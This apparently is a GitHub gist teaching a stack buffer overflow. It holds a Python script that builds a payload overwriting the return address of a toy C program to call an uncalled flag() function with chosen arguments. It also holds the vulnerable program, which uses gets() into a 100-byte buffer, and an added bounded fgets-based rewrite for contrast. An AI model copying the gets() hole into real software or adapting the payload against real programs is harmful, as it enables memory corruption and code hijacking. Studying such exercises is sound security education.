@mishazawa
Last active April 10, 2024 21:56
buffer overflow example with parameters
junk_l = 22
# can be different when compiled
function_addr = b"\x56\x55\x61\xad"
arg_a = b"\xde\xad\xbe\xef"
arg_b = b"\xc0\xde\xd0\x0d"

with open("./data", "wb") as f:
    junk = b"A" * junk_l
    # reverse bytes aka Little endian
    fun = function_addr[::-1]
    a = arg_a[::-1]
    b = arg_b[::-1]
    # join payload and args (reverse order) and add offset between them
    f.write(junk + fun + b"junk" + b + a)

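// gcc vuln.c -o vuln
#include <stdio.h>

/* Never called from main(); prints "OK" only for these two argument values. */
void flag(int a, int b) {
    if (a == 0xdeadbeef && b == 0xc0ded00d) {
        printf("OK");
    }
}

void vuln() {
    char input[100];
    /* gets() has no length limit, so a long line writes past input[] */
    gets(input);
    puts(input);
}

int main () {
    vuln();
    return 0;
}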
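
For contrast with `vuln()` above, a bounded version that reads at most 99 bytes into the same 100-byte buffer and rejects an over-long line whole. This is an added example, not part of the original gist; `read_line`, `safe_vuln` and `feed` are hypothetical names, and the inputs are constructed.

```c
#include <stdio.h>
#include <string.h>
#define INPUT_CAP 100 /* same size as input[] in the gist's vuln() */

/* Read one line into buf (cap bytes, always NUL-terminated). Returns the
 * line length, -1 on EOF/error with nothing read, or -2 when the line does
 * not fit; the excess is drained so the next read starts on a fresh line. */
int read_line(FILE *in, char *buf, size_t cap) {
    if (cap < 2 || !fgets(buf, (int)cap, in)) return -1;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[--len] = '\0';
        return (int)len;
    }
    int c = fgetc(in);
    if (c == EOF || c == '\n') return (int)len; /* exact fit / no final newline */
    while ((c = fgetc(in)) != '\n' && c != EOF)
        ; /* discard the part that gets() would have written past the buffer */
    return -2;
}

/* Bounded counterpart of vuln(): echo the line, or reject it whole. */
int safe_vuln(FILE *in) {
    char input[INPUT_CAP];
    int n = read_line(in, input, sizeof input);
    if (n >= 0)
        puts(input);
    else if (n == -2)
        fputs("input too long, rejected\n", stderr);
    return n;
}

/* Demo helper (hypothetical): run safe_vuln() on constructed bytes. */
int feed(const char *data, size_t n) {
    FILE *f = tmpfile();
    if (!f) return -99;
    fwrite(data, 1, n, f);
    rewind(f);
    int r = safe_vuln(f);
    fclose(f);
    return r;
}

int main(void) {
    char big[200];
    memset(big, 'A', sizeof big); /* constructed over-long input */
    printf("short -> %d, long -> %d\n", feed("hello\n", 6), feed(big, sizeof big));
    return 0;
}
```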